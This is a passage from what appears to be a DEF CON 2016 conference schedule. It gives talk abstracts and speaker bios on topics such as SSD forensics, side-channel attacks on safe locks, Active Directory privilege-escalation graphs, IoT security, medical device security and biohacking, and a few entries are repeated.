Everything you know about your environment mediated by your senses. Likely, you can see in a range of colors, hear a car horn honking, and feel the roughness of sandpaper, but light exists in bands too narrow or wide to be processed by your eyes, some sounds are too high or low to be recognized by your ears, and magnetic fields pulse around you all day. Most of us hardly notice. Dr. Paul Bach-y-Rita’s research in the 60’s eventually lead to The BrainPort which lets a user see through an electrode grid on your tongue, but sensory augmentation has stayed mostly within the realm of the medical field until recently. Now there are magnets in fingertips all over the place, Neil Harbisson can hear in colors in a wider range than you can see and companies like NeoSensory and Cyborg Nest are building even more devices that let you sense more or differently. We’ll talk through the basics of how your senses work in conjunction with your brain, about many of the great projects that help have helped individuals augment their senses, and why a vibrating North-sensing device mounted to your chest is different than a compass.
Return to Index
DEFCON - DEF CON 101 - Friday - 13:00-13:59
101 Sentient Storage - Do SSDs Have a Mind of Their Own?
Tom Kopchak Director of Technical Operations, Hurricane Labs
Solid state drives drives are fundamentally changing the landscape of the digital forensics industry, primarily due to the manner in which they respond to the deletion of files. Previous research has demonstrated that SSDs do not always behave in an equivalent manner to magnetic hard drives, however, the scope of these differences and the conditions that lead to this behavior are still not well understood. This basic, undeniable anomaly regarding file storage and recovery begs one simple, yet critical question: can the data being mined for evidence be trusted?
This talk presents research on the forensic implications of SSDs from one of the most comprehensive studies to date. The goal of this study was to demonstrate and quantify differences across a sample pool of drives in an array of tests conducted in a controlled environment. These tests explored the variations between drive firmware, controllers, interfaces, operating systems, and TRIM state.
Further observations revealed that some drives behaved nearly identical to the control drive, while others showed that the prospects of recovering deleted data was significantly reduced. This presentation will demonstrate these differences and provide a framework to allow forensics investigators to determine the likelihood of successful deleted file recovery from an evidence bearing solid state drive.
Tom Kopchak is the Director of Technical Operations at Hurricane Labs, where he pretends to manage a team of network and system engineers, but is still an engineer and technology geek at heart. While new to the DEF CON stage, Tom’s speaking experience includes numerous talks on breaking full disk encryption (including BSides LV) and numerous other talks at other conferences around the country. He holds a Master’s degree in Computing Security from the Rochester Institute of Technology. When he is not working with computers, Tom enjoys composing, music improvisation (Acts of Music), and playing both the piano and organ.
Twitter: @tomkopchak
Return to Index
DEFCON - Track Two - Friday - 16:00-16:59
Side-channel Attacks on High-security Electronic Safe Locks
Plore Hacker
Electronic locks are becoming increasingly common on consumer-grade safes, particularly those used to secure guns. This talk explores vulnerabilities of several UL-listed Type 1 "High Security" electronic safe locks. Using side-channel attacks, we recover the owner-configured keycodes on two models of these locks from outside of locked safes without any damage to the locks or safes. Discussion includes power-line analysis, timing attacks, and lockout-defeat strategies on embedded devices.
An embedded software developer with a background in electrical engineering, Plore has long been fascinated by computer security and locks. One day he found himself wondering if the trust bestowed on electronic locks was actually misplaced. He decided to investigate.
Return to Index
CPV - Bronze 1 - Saturday - 10:00-11:00
Talk Title:
Silicon Valley and DC talk about freedom, crypto, and the cybers
Speaker Name, Employer or position:
Alex Stamos - CSO at Facebook, Rep. Eric Swalwell (D-CA 15th), Rep. Will Hurd (R-TX 23rd)
Abstract:
In this session the CSO of a major tech company (Facebook) will interview these (2-4) Congresscritters on their views on encryption, balancing different ideas of security, and the future of the Internet as a tool for oppression or freedom.
Bio:
Alex discovered DEF CON 5 at the ripe old age of 18 (his dad rented the room). Since then, he broke a lot of things, built a company to foster security research, and fought on the front lines of a transforming industry. He's currently bought-in as the Chief Security Officer at Facebook, dedicated to protecting the billions of people who use its products and to ensuring a safe future for the open and connected world.
Rep. Eric Swalwell (D-CA 15th) https://swalwell.house.gov/about
Rep. Will Hurd (R-TX 23rd) https://hurd.house.gov/about/full-biography
Social media links if provided:
@alexstamos, @RepSwalwell, @HurdOnTheHill
Return to Index
DEFCON - DEF CON 101 - Saturday - 14:00-14:59
SITCH - Inexpensive, Coordinated GSM Anomaly Detection
ashmastaflash Hacker
It's recently become easier and less expensive to create malicious GSM Base Transceiver Station (BTS) devices, capable of intercepting and recording phone and sms traffic. Detection methods haven't evolved to be as fast and easy to implement. Wireless situational awareness has a number of challenges. Categorically, these challenges are usually classified under Time, Money, or a lot of both. Provisioning sensors takes time, and the fast stuff usually isn’t cheap. Iterative improvements compound the problem when you need to get software updates to multiple devices in the field. I’ll present a prototype platform for GSM anomaly detection (called SITCH) which uses cloud-delivered services to elegantly deploy, manage, and coordinate the information from many independent wireless telemetry sensors (IoT FTW). We’ll talk about options and trade-offs when selecting sensor hardware, securing your sensors, using cloud services for orchestrating firmware, and how to collect and make sense of the data you’ve amassed. Source code for the prototype will be released as well. The target audience for this lecture is the hacker/tinkerer type with strong systems and network experience. A very basic understanding of GSM networks is a plus, but not required.
Ashmastaflash is a native of southeast Tennessee and a recent transplant to San Francisco. He entered the security domain through systems and network engineering, spent a number of years in network security tooling and integration, and currently works in R&D for CloudPassage.
Return to Index
DEFCON - Track One - Saturday - 13:00-13:59
Six Degrees of Domain Admin - Using Graph Theory to Accelerate Red Team Operations
Andy Robbins (@_wald0),
Offensive Network Services Team Lead, Veris Group
Rohan Vazarkar (@cptjesus) Penetration Tester, Veris Group
Will Schroeder (@harmj0y) Researcher, Veris Group
Active Directory domain privilege escalation is a critical component of most penetration tests and red team assessments, but standard methodology dictates a manual and often tedious process – gather credentials, analyze new systems we now have admin rights on, pivot, and repeat until we reach our objective. Then -- and only then -- we can look back and see the path we took in its entirety. But that may not be the only, nor shortest path we could have taken. By combining our concept of derivative admin (the chaining or linking of administrative rights), existing tools, and graph theory, we can reveal the hidden and unintended relationships in Active Directory domains.
Bob is an admin on Steve’s system, and Steve is an admin on Mary’s system; therefore, Bob is effectively (and perhaps unintentionally) an admin on Mary’s system. While existing tools such as Nmap, PowerView, CrackMapExec, and others can gather much of the information needed to find these paths, graph theory is the missing link that gives us the power to find hidden relationships in this offensive data. The application of graph theory to an Active Directory domain offers several advantages to attackers and defenders. Otherwise invisible, high-level organizational relationships are exposed. All possible escalation paths can be efficiently and swiftly identified. Simplified data aggregation accelerates blue and red team analysis. Graph theory has the power and the potential to dramatically change the way you think about and approach Active Directory domain security.
Andy Robbins is the Offensive Network Services lead for Veris Group's Adaptive Threat Division. He has performed penetration tests and red team assessments for a number of Fortune 500 commercial clients and major U.S. Government agencies. In addition, Andy researched and presented findings related to a business logic flaw with certain processes around handling ACH files affecting thousands of banking institutions around the country at DerbyCon. He has a passion for offensive development and red team tradecraft, and helps to develop and teach the ‘Adaptive Red Team Tactics’ course at BlackHat USA.
Twitter: @_wald0
Rohan Vazarkar is a penetration tester and red teamer for Veris Group's Adaptive Threat Division, where he helps assess fortune 500 companies and a variety of government agencies. Rohan has a passion for offensive development and tradecraft, contributing heavily to EyeWitness and the EmPyre projects. He has presented at BSides DC, and helps to develop and teach the ‘Adaptive Penetration Testing’ course at BlackHat USA.
Twitter: @cptjesus
Will Schroeder is security researcher and red teamer for Veris Group's Adaptive Threat Division. He is a co-founder of the Veil-Framework, developed PowerView and PowerUp, is an active developer on the PowerSploit project, and is a co-founder and core developer of the PowerShell post-exploitation agent Empire. He has presented at a number of security conferences on topics spanning AV-evasion, post-exploitation, red team tradecraft, and offensive PowerShell.
Twitter: @harmj0y
Return to Index
DEFCON - Track Two - Friday - 17:00-17:59
Sk3wlDbg: Emulating All (well many) of the Things with Ida
Chris Eagle sk3wl 0f fucking r00t
It is not uncommon that a software reverse engineer finds themselves desiring to execute a bit of code they are studying in order to better understand that code or alternatively to have that code perform some bit of useful work related to the reverse engineering task at hand. This generally requires access to an execution environment capable of supporting the machine code being studied, both at an architectural level (CPU type) and a packaging level (file container type). Unfortunately, this is not always a simple matter. The majority of analysts do not have a full complement of hosts available to support a wide variety of architectures, and virtualization opportunities for non-intel platforms are limited. In this talk we will discuss a light weight emulator framework for the IDA Pro disassembler that is based on the Unicorn emulation engine. The goal of the project is to provide an embedded multi-architectural emulation capability to complement IDA Pro's multi-architectural disassembly capability to enhance the versatility of one of the most common reverse engineering tools in use today.
Chris Eagle is a registered hex offender. He has been taking software apart since he first learned to put it together over 35 years ago. His research interests include computer network operations, malware analysis and reverse/anti-reverse engineering techniques. He is the author of The IDA Pro Book and has published a number of well-known IDA plug-ins. He is also a co-author of Gray Hat Hacking. He has spoken at numerous conferences including Black Hat, DEF CON , Shmoocon, and ToorCon. Chris also organized and led the Sk3wl of r00t to two DEF CON Capture the Flag championships and produced that competition for four years as part of the DDTEK organization.
Twitter: @sk3wl
Return to Index
SkyTalks - Skyview 3 - Friday - 18:00-18:59
Speaker: Rick Glass
Talk: Slack as Intelligence Collector or how anime cons get weird
Slack, and other apps like it, are currently advertised as ways for corporate teams to communicate more effectively. However, with minimal effort, it can also be used as a quick and dirty way to catalog mugshots and gather collected intel from disparate sources. In this talk, I show you how this was done at an anime con. Horror stories about anime cons encouraged.
Return to Index
Wireless - Skyview 1 - Saturday - 12:00-12:20
Gabriel Ryan
Bio
Gabriel is a pentester, CTF player, and Python junkie. He currently works as a Security Engineer at Gotham Digital Science. He also leads wireless security for the BSides Las Vegas NOC team. Previously he has worked for OGSystems and Rutgers University. Things that make him excited include wireless security, software defined radio, and playing with fire. In his spare time, he enjoys live music and riding motorcycles.
@s0lst1c3
Slaying Rogue Access Points with Python and Cheap Hardware
Abstract
"Evil Twin and Karma attacks are both highly effective methods through which shady people can pluck your credentials from thin air. Although progress has been made in preventing these attacks, most existing solutions are expensive and only available to enterprise customers.
Fortunately, it turns out that it's actually much simpler to write tools that stop these kinds of attacks than it is to build tools to carry them out. This talk will demonstrate how to use Python, a punk rock DIY mindset, and cheap commodity hardware to detect and mitigate Evil Twin and Karma attacks.
Well also explore the limitations of these protective methods, as well as offensive techniques to exploit these weaknesses that have yet to be addressed."
|
Return to Index
DEFCON - Track Two - Friday - 15:00-15:59
Slouching Towards Utopia: The State of the Internet Dream
Jennifer S. Granick Director of Civil Liberties, Stanford Center for Internet and Society
Is the Internet going to live up to its promise as the greatest force for individual freedom that the world has ever known? Or is the hope for a global community of creative intellectual interaction lost…for now?
In last year’s Black Hat keynote—entitled "Lifecycle of a Revolution"—noted privacy and civil liberties advocate Jennifer Granick told the story of the Internet utopians, people who believed that Internet technology could greatly enhance creative and intellectual freedom. Granick argued that this Dream of Internet Freedom was dying, choked off by market and government forces of centralization, regulation, and globalization. The speech was extremely popular. Almost 8000 people watched it at Black Hat. It was retweeted, watched and read by tens of thousands of people. Boing Boing called it "the speech that won Black Hat (and DEF CON )."
This year, Granick revisits the state of the Internet Dream. This year’s crypto war developments in the U.S. and U.K. show governments’ efforts to control the design of technologies to ensure surveillance. The developments also show that governments see app stores as a choke point for regulation and control, something that couldn’t easily happen with general purpose computers and laptops but which could be quite effective in a world where most people access the network with mobile devices.
Also in the past year, the European Court of Justice embraced blocking orders and ISP liability in the name of stopping copyright infringement, privacy violations, and unflattering comments from ever being published online. The effect of these developments is to force Internet companies to be global censors on the side of online civility against the free flow of information and opinion. If we want to realize some of the promise of the Internet utopian vision, we are going to have to make some hard political choices and redesign communications technology accordingly. The future could look a lot like TV, or we could work to ensure our technology enshrines individual liberties. This talk will help attendees join that effort.
In 1995, Jennifer Granick attended her first DEF CON at the Tropicana Hotel. Since then, she has defended hackers and coders in computer crime, copyright, DMCA and other cases. Jennifer left her criminal law practice in 2001 to help start the Stanford Center for Internet and Society (CIS). From 2001 to 2007, Jennifer was Executive Director of CIS and taught Cyberlaw, Computer Crime Law, Internet intermediary liability, and Internet law and policy. From 2008 to 2010, Jennifer worked with the boutique firm of Zwillgen PLLC and as Civil Liberties Director at the Electronic Frontier Foundation. Today, Jennifer has returned to CIS as Director of Civil Liberties. She teaches, practices, speaks, and writes about computer crime and security, electronic surveillance, technology, privacy, and civil liberties. She earned her law degree from University of California, Hastings College of the Law and her undergraduate degree from the New College of Florida.
Twitter: @granick
Medium
Center for Internet and Society
Just Security
Return to Index
IOT - Bronze 1 - Saturday - 13:00-13:50
SNMP and IoT Devices: Let me Manage that for you Bro!
Bertin Bervis
In this talk i'm going to cover the basics of how snmp works and how we can use it to take control over several IoT devices with R/W permissions remotely, we are going to abuse the bad configuration issue in order to turn on/off traffic lights systems, discover ATMs, power supplies , and several industrial equipment.
Also i'm going to demonstrate how a remote attacker can retrieve the password of networking devices like Huawei and Cisco equipment.
Several devices are exposed in the public internet running snmp agents with R/W permissions, this talk is going to covert how a bad management could lead to a potential attack in the IoT field with bad consequences in real life, the talk is for hackers, network engineers and security researchers and people concern about security in the IoT field.
Bertin Bervis is security researcher from san jose costa rica, he is the co-founder of the NetDB project, a certificate/fingerprint device search engine, he has been speaker in several technical security conferences like DEFCON, in latin america EKOPARTY, DragonJar and the OWASP Latin tour. Formerly is a network engineer and software developer.
Return to Index
DEFCON - DEF CON 101 - Sunday - 12:00-12:59
So You Think You Want To Be a Penetration Tester
Anch Hacker
So, you think you want to be a penetration tester, or you already are and don't understand what the difference between you and all the other "so called" penetration testers out there. Think you know the difference between a Red Team, Penetration Test and a Vulnerability assessment? Know how to write a report your clients will actually read and understand? Can you leverage the strengths of your team mates to get through tough roadblocks, migrate, pivot, pwn and pillage? No? well this talk is probably for you then! We will go through the fascinating, intense and often crazily boring on-site assessment process. Talk about planning and performing Red Teams, how they are different, and why they can be super effective and have some fun along the way. I'll tell you stories that will melt your face, brain and everything in between. Give you the answers to all of your questions you never knew you had, and probably make you question your life choices. By the end of this session you will be ready to take your next steps into the job you've always wanted, or know deep inside that you should probably look for something else. There will be no judgment or shame, only information, laughter and fun.
Anch currently works on a Red Team for an agency with a 3 letter acronym. It's not secret squirrel, or hush hush he just doesn't like to talk about himself very much. He has 15 years of experience in penetration testing and cyber security with a background in control systems and security architecture.
Twitter: @boneheadsanon
Return to Index
CPV - Bronze 1 - Saturday - 11:00-12:00
Talk Title:
SSL Visibility, Uncovered
Speaker Name, Employer or position:
Andrew Brandt - Director of Threat Research at Blue Coat Systems
Abstract:
Blue Coat Systems is a large network and cloud security company who counts many of the world's most important companies as its clients. Among its product offerings are a range of appliances collectively called the Advanced Threat Protection suite, which include a standalone SSL man-in-the-middle decryption device known as SSL Visibility (SSL-V). Both the company and this particular product have been much maligned, but SSL-V has become a vital and important tool in the incident responder kit. This presentation will attempt to bring clarity to the many misconceptions about SSL Visibility, including how it works, what it can and can't do, and why SSL-V isn't as scary as some people make it out to be.
Bio:
Andrew Brandt (Spike) is the Director of Threat Research at Blue Coat Systems. He is a former editor and columnist for a large consumer tech publication and Internet privacy expert who found his way into the world of malware analysis and network forensics from investigative journalism. In his day job, he infects computers with malware in order to observe their behavior and retrospectively learn about the communications methods and control networks criminals use to manage infected hosts.
Social media links if provided:
@threatresearch
Return to Index
BHV - Skyview 4 - Saturday - 15:30-15:59
Speaker: Chris Frenz
About Chris Frenz:
Christopher Frenz is an expert on healthcare security and privacy. He the author of the books "Visual Basic and Visual Basic .NET for Scientists and Engineers" and "Pro Perl Parsing," as well as the author of numerous articles on security related topics. He is an active member in the security community and the project lead for the OWASP Anti-Ransomware Guide and OWASP Secure Medical Device Deployment Standard projects. Frenz holds many industry standard certifications, including CISSP, HCISPP, CISM, CISA, CIPP/US, CIPM, CIPT, and CCSK.
Abstract:
In recent months it seems like not a week passes where you do not encounter a headline that states that a healthcare organization has been held for ransom or in some other way involved in a breach. Healthcare has been a sector that has routinely been described as being lax with the implementation and enforcement of information security controls and the challenges faced by healthcare organizations are growing as attackers begin to look past EHR and PACS systems and target the medical devices within them. That older but still very functional computerized medical supply cabinet which was installed to improve the efficiency of operations can now be seen as a liability in that its aging unpatched control node may contain hundreds of unpatched vulnerabilities. Vulnerabilities that in the case of malware like Medjack can be used to compromise the device and use it as a staging ground for attacks against other hospital systems. In some cases, however, the risk goes beyond just a breach vector and can directly impact human life. What if that infusion pump’s dosage was illegitimately changed or the pacemaker programming made malicious? What if Brickerbot took out a surgical robot or a heart monitor at a critical time? These issues could readily give a whole new meaning to the term Denial of Service and cannot be ignored. While the FDA recently issued some guidance for the manufacturers of such devices, the secure deployment of such devices is also critical for security as all of the security features in the world are useless if no one terms them on or configures them improperly. This presentation will discuss the OWASP Secure Medical Device Deployment Standard and requisite methods that can be used to securely deploy medical devices in order to help to prevent their compromise as well as mitigate the damage that can occur if a successful compromise were to occur.
Return to Index
BHV - Skyview 4 - Saturday - 15:30-15:59
Speaker: Chris Frenz
About Chris Frenz:
Christopher Frenz is an expert on healthcare security and privacy. He the author of the books "Visual Basic and Visual Basic .NET for Scientists and Engineers" and "Pro Perl Parsing," as well as the author of numerous articles on security related topics. He is an active member in the security community and the project lead for the OWASP Anti-Ransomware Guide and OWASP Secure Medical Device Deployment Standard projects. Frenz holds many industry standard certifications, including CISSP, HCISPP, CISM, CISA, CIPP/US, CIPM, CIPT, and CCSK.
Abstract:
In recent months it seems like not a week passes where you do not encounter a headline that states that a healthcare organization has been held for ransom or in some other way involved in a breach. Healthcare has been a sector that has routinely been described as being lax with the implementation and enforcement of information security controls and the challenges faced by healthcare organizations are growing as attackers begin to look past EHR and PACS systems and target the medical devices within them. That older but still very functional computerized medical supply cabinet which was installed to improve the efficiency of operations can now be seen as a liability in that its aging unpatched control node may contain hundreds of unpatched vulnerabilities. Vulnerabilities that in the case of malware like Medjack can be used to compromise the device and use it as a staging ground for attacks against other hospital systems. In some cases, however, the risk goes beyond just a breach vector and can directly impact human life. What if that infusion pump’s dosage was illegitimately changed or the pacemaker programming made malicious? What if Brickerbot took out a surgical robot or a heart monitor at a critical time? These issues could readily give a whole new meaning to the term Denial of Service and cannot be ignored. While the FDA recently issued some guidance for the manufacturers of such devices, the secure deployment of such devices is also critical for security as all of the security features in the world are useless if no one terms them on or configures them improperly. This presentation will discuss the OWASP Secure Medical Device Deployment Standard and requisite methods that can be used to securely deploy medical devices in order to help to prevent their compromise as well as mitigate the damage that can occur if a successful compromise were to occur.
Return to Index
DEFCON - Track Two - Saturday - 12:00-12:59
Stargate: Pivoting Through VNC to Own Internal Networks
Yonathan Klijnsma Senior Threat Intelligence Analyst, Fox-IT
Dan Tentler (Viss) Founder, Phobos Group
VNC is a great tool to use if you need to get to a box you're not physically near. The trouble with VNC is that it was invented 15+ years ago and hasn't been improved upon in any significant way. Besides the internet of things being sprinkled with VNC endpoints, there are companies which use VNC to such a large degree they need a VNC proxy on their perimeter to get to all the internal VNC hosts - some of which are ICS/SCADA devices. Stargate is the result of discovering a vulnerability in these VNC proxies that allows you to proxy basically anything. This allows you to do anything from using them as anonymous proxies, conduct reflective scanning, pivoting into the internal network behind it, and more. In this presentation we will show you exactly what Stargate is, how we encountered it, the 'fun' things you can do with the Stargates all around the globe and we will release the Stargate tool which anyone can use to talk to/through these devices.
Yonathan Klijnsma is a senior threat intelligence analyst working for Fox-IT, a Dutch IT security company. Yonathan specializes in the analysis and tracking of attack campaigns, work out the attacker profiles and investigate the techniques and tools used by attackers. Yonathan's area of focus lies in the espionage related cases. Outside of work Yonathan likes taking things apart and figuring out how they work; be it physical devices or digital like malware or ransomware. Occasionally a write-up of one of these projects ends up on his personal blog.
Dan Tentler is the founder and CEO of The Phobos Group, a boutique information security services company. Previously a co-founder of Carbon Dynamics, and a security freelancer under the Aten Labs moniker, Dan has found himself in a wide array of different environments, ranging from blue team, to red team, to purple team, to ‘evil hacker for a camera crew’. When not obtaining shells or explaining against how to get shelled, Dan enjoys FPV racing, homebrewing, and internet troublemaking.
Return to Index
CPV - Bronze 2 - Friday - 18:00-18:30
Talk Title:
State of the Curve - 2016
Speaker Name, Employer or position:
Deirdre Connolly - Senior Software Engineer at Brightcove
Abstract:
There's been a lot happening in the world of elliptic curve cryptography lately: new IETF-approved curves for use in protocols like TLS, Juniper's Dual_EC_DRBG getting its points swapped in the wild, and new advances in isogeny-based crypto that may keep some form of ECC alive in a post-quantum world. In this talk we'll touch on these topics as we get a broad look at the current state of curves in modern cryptography.
Bio:
Deirdre Connolly is a self-taught cryptography enthusiast and a senior software engineer at Brightcove, where she drives application security. She has a BS in Electrical Engineering and Computer Science from MIT.
Social media links if provided:
@durumcrustulum
Return to Index
DEFCON - DEF CON 101 - Saturday - 17:00-17:59
Sticky Keys To The Kingdom: Pre-auth RCE Is More Common Than You Think
Dennis Maldonado (AKA Linuz) Security Consultant - LARES Consulting
Medic (Tim McGuffin) Security Consultant - LARES Consulting
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not, thousands of machines on the internet [remotely]. No, this is not a new super 1337 exploit and no this is not even a new technique. No super fancy website with poorly designed logo is necessary, there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue, turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
Dennis Maldonado is a Security Consultant at LARES Consulting. His current work includes penetration testing, infrastructure assessments, red teaming, and security research. Dennis’ focus is encompassing all forms information security into an assessment in order to better simulate a real world attack against systems and infrastructure. As a security researcher and evangelist, Dennis spends his time sharing what he knows about Information Security with anyone willing to learn. Dennis is a returning speaker to DEF CON and has presented at numerous workshops and meet-ups in the Houston area. Dennis co-founded Houston Locksport in Houston, Texas where he shares his love for lock-picking physical security as well as Houston Area Hackers Anonymous (HAHA), a meet-up for hackers and InfoSec professionals in the Houston area.
Twitter: @DennisMald
Tim was voted "most likely to be indicted" by his high school senior class, but has since gone on to gain the trust of large organizations and their executive management, which may or may not be a good thing. He holds a few industry certifications and is a member of a few security organizations, but considers his insomnia and attention deficit problems far more important to his career.
Twitter: @NotMedic
Return to Index
DEFCON - Track One - Sunday - 15:00-15:59
Stumping the Mobile Chipset
Adam Donenfeld Senior Security Researcher, Check Point
Following recent security issues discovered in Android, Google made a number of changes to tighten security across its fragmented landscape. However, Google is not alone in the struggle to keep Android safe. Qualcomm, a supplier of 80% of the chipsets in the Android ecosystem, has almost as much effect on Android’s security as Google. With this in mind, we decided to examine Qualcomm’s code in Android devices. During our research, we found multiple privilege escalation vulnerabilities in multiple subsystems introduced by Qualcomm to all its Android devices in multiple different subsystems. In this presentation we will review not only the privilege escalation vulnerabilities we found, but also demonstrate and present a detailed exploitation, overcoming all the existing mitigations in Android’s Linux kernel to run kernel-code, elevating privileges and thus gaining root privileges and completely bypassing SELinux.
Adam Donenfeld is a lead mobile security researcher at Check Point with vast experience in the mobile research field. From a young age he has been hacking and reverse engineering for fun and profit. Prior to Check Point Adam served in an Israeli elite intelligence unit, as a security researcher. In his free time, Adam studies German.
Return to Index
CPV - Bronze 2 - Friday - 10:30-11:00
Talk Title:
Tabletop Cryptography
Speaker Name, Employer or position:
nibb13
Abstract:
A basic understanding of cyphers and cryptography is part of a solid foundation for anyone in the InfoSec field. Today we use crypto without much second thought, but cryptography, or the use of ciphers and codes to protect secrets, has been around for thousands of years. Until the early 20th century, encryption was done with pen and paper or simple mechanical devices. My Tabletop Cryptography talk is about the history of cryptography and cryptanalysis as well as fun with examples of crypto-puzzles that can all be completed without the use of modern infernal computing devices.
Bio:
Husband, father, infosec geek
Social media links if provided:
@nibb13
Return to Index
Workshops - Las Vegas Ballroom 4 - Saturday - 10:00-14:00
Taking a bite out of Apple
John Poulin Principal Application Security Consultant, nVisium
This workshop will provide a solid introduction to the concepts of iOS application security from a black-box perspective. Students will learn concepts relating to assessing the security iOS applications. In this course we will use real-world examples from the Apple App Store in contrast with several intentionally vulnerable examples. Students are expected to have little to no experience.
John Poulin is a principal application security consultant for nVisium who specializes in web and mobile application security. He worked previously as a web developer and software engineer. When he's not hacking on apps, John spends his time building tools to help him hack on web apps!
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Mac OS X w/ XCode. Jailbroken physical devices are recommended.
Return to Index
SkyTalks - Skyview 3 - Saturday - 18:00-18:59
Speaker: Phax
Talk: Taking Down Skynet (By Subverting the Command and Control Channel)
The only hope humanity has to resist the oncoming bot invasion and restructuring of the global order is to co-opt the command and control channel (the government of the United States and the Military Industrial Complex)
Return to Index
BHV - Skyview 4 - Friday - 13:00-13:59
Speaker: Kevin Sacco
About Kevin
Kevin is healthcare threat hunter and has been conducting ethical hacking since the time when wardialing and sitting in hot vans all day with a bazooka (not Joe's gum) to do wardriving was in vogue. He has over 16 years experience in IT security and compliance ranging from active duty service in the US military, Big 4 consulting, compliance management at a large tech company and more recently healthcare-focused consulting - where has led and conducted more than 50 hacking engagements in the past 3 years. Kevin is the coauthor of a whitepaper on "Hacking Healthcare" and has assisted the Office of Civil Rights on a study to advise and guide the government on hacking in healthcare. In his spare time - Kevin is trained and enjoys experimenting with and working with people in various forms of cutting edge psychology and diet and nutrition approaches to maximize human potential.
Abstract:
Over past decade, electronic medical records (EMR's) and networked medical devices have become a healthcare norm. However, vendors and consumers alike have not paid sufficient attention to the security implications of EMR's and networked medical devices. In this talk, I will cover my experience [ethical] hacking and social engineering my way into healthcare networks. I will highlight security issues with healthcare networks and share real life stories.
Return to Index
BHV - Skyview 4 - Friday - 13:00-13:59
Speaker: Kevin Sacco
About Kevin
Kevin is healthcare threat hunter and has been conducting ethical hacking since the time when wardialing and sitting in hot vans all day with a bazooka (not Joe's gum) to do wardriving was in vogue. He has over 16 years experience in IT security and compliance ranging from active duty service in the US military, Big 4 consulting, compliance management at a large tech company and more recently healthcare-focused consulting - where has led and conducted more than 50 hacking engagements in the past 3 years. Kevin is the coauthor of a whitepaper on "Hacking Healthcare" and has assisted the Office of Civil Rights on a study to advise and guide the government on hacking in healthcare. In his spare time - Kevin is trained and enjoys experimenting with and working with people in various forms of cutting edge psychology and diet and nutrition approaches to maximize human potential.
Abstract:
Over past decade, electronic medical records (EMR's) and networked medical devices have become a healthcare norm. However, vendors and consumers alike have not paid sufficient attention to the security implications of EMR's and networked medical devices. In this talk, I will cover my experience [ethical] hacking and social engineering my way into healthcare networks. I will highlight security issues with healthcare networks and share real life stories.
Return to Index
SkyTalks - Skyview 3 - Saturday - 15:00-15:59
Speaker: Vincent Canfield
Talk: Tales from the Dongosphere: Lessons Learned Hosting Public E-mail for 4chan
In 2015, a malicious user sent an anonymous E-mail through my service threatening violence against schools in Los Angeles and New York. As a result, all schools in Los Angeles were closed, 610,000 students stayed home, and 1500 schools were combed through by SWAT teams for bombs that werent there. Because I was the only public figure involved, I faced an incredible amount of heat from the media, governments, and the public.
It hasnt been that bad, though. Since 2013, I have been hosting anonymous, Tor-friendly E-mail @cock.li, @8chan.co, and several other domains for anyone who wants them. In this talk I candidly talk about the people Ive met, the shit Ive faced, and the lessons Ive learned from hosting E-mail for 4chan.
Return to Index
IOT - Bronze 4 - Friday - 11:30-11:59
TBA - Paul Dant
No description available
Return to Index
BHV - Skyview 4 - Friday - 18:00-18:59
Speakers: Darren and Jen
About Darren and Jen:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.
Darren Lawless is a security analyst with 13+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays, experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech bad-assedness. Still a squire in the realm, he maintains the ability to ask real world questions like, "Why (why not) do this? What are the risks? Should we care?"
Abstract:
Are you interested in experimenting with tDCS but don't want to pay a high price for commercial devices? Are you a maker and tinkerer at heart? If so, then this workshop is for you. Join us as we walk you through the process of DIYing your very own tDCS device. Donations for kits appreciated ($10 or whatever you like)
Return to Index
BHV - Skyview 4 - Friday - 18:00-18:59
Speakers: Darren and Jen
About Darren and Jen:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.
Darren Lawless is a security analyst with 13+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays, experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech bad-assedness. Still a squire in the realm, he maintains the ability to ask real world questions like, "Why (why not) do this? What are the risks? Should we care?"
Abstract:
Are you interested in experimenting with tDCS but don't want to pay a high price for commercial devices? Are you a maker and tinkerer at heart? If so, then this workshop is for you. Join us as we walk you through the process of DIYing your very own tDCS device. Donations for kits appreciated ($10 or whatever you like)
Return to Index
BHV - Skyview 4 - Saturday - 15:30-15:59
Speaker: Christian Dameff
@cdameffmd
About Christian Dameff:
As biohackers continue to rip through the red tape and uncover the future of humanity in basements all across the globe, ethical discussion regarding self-experimentation, genetic manipulation, definitions of humanity, and other hugely important issues are central to an effective biohacking future. Join two biohacking physician ethicists on a journey filled with biohacking dilemmas, medical correlates, and poorly executed puns.
Abstract:
Christian (quaddi) Dameff MD is an Emergency Medicine doctor, former open capture the flag champion, prior Defcon speaker, bioethicist, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. His most recent focus is on biohacking, medical device security, and critical medical infrastructure cyber security. He can’t spell words well. This is his twelfth Defcon.
Return to Index
BHV - Skyview 4 - Friday - 12:00-12:59
Speaker: Keoni Gandall
About Keoni:
